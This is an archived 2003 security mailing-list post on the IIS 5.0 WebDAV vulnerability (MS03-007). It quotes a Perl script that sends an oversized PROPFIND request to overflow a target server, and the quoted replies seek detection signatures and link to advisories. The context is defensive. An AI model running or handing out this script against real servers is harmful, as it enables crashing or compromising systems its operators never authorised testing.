[unisog] IIS problem du jour

Johannes Ullrich jullrich at euclidian.com
Tue Mar 18 14:49:47 GMT 2003



This was posted to slashdot as a 'test' to find vulnerable servers. Haven't tried it yet:

--------------------

#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
# ^^^^ This is another issue and also works with length ~>65000
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";

-------------------


On Tue, 18 Mar 2003 08:18:13 -0500
"Joshua Wright" <Joshua.Wright at jwu.edu> wrote:

> Can anyone shed some light on a signature that could be used to detect
> this tool?  The snort-sigs list hasn't come up with a signature for this
> attack yet.  If anyone believes they are seeing attacks to exploit this
> vulnerability, please share obfuscated logging information from IIS.
> 
> Thanks.
> 
> -Joshua Wright
> Senior Network and Security Architect
> Johnson & Wales University
> Joshua.Wright at jwu.edu 
> http://home.jwu.edu/jwright/
> 
> pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
> fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
> 
> 
> 
> > -----Original Message-----
> > From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu]
> > Sent: Monday, March 17, 2003 5:57 PM
> > To: Anderson Johnston
> > Cc: unisog at sans.org; security at umbc.edu
> > Subject: Re: [unisog] IIS problem du jour 
> > 
> > 
> > On Mon, 17 Mar 2003 17:07:27 EST, Anderson Johnston said:
> > > 
> > > 
> > http://www.microsoft.com/technet/treeview/default.asp?url=/tec
> > hnet/security/b
> > ulletin/MS03-007.asp
> > > 
> > > An attack on IIS WebDAV.  The CAN reference given in the 
> > above URL is
> > > still under CVE editorial review.
> > > 
> > > 
> > > Has anyone see this wild?  Got any NIDS signatures for it?
> > 
> > Yes, it's in the wild - a 0-day nailed some .MIL servers.
> > 
> > http://www.msnbc.com/news/886524.asp?0cv=CB10
> > 
> > http://www.cert.org/advisories/CA-2003-09.html
> > 
> > 
> 


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org



More information about the unisog mailing list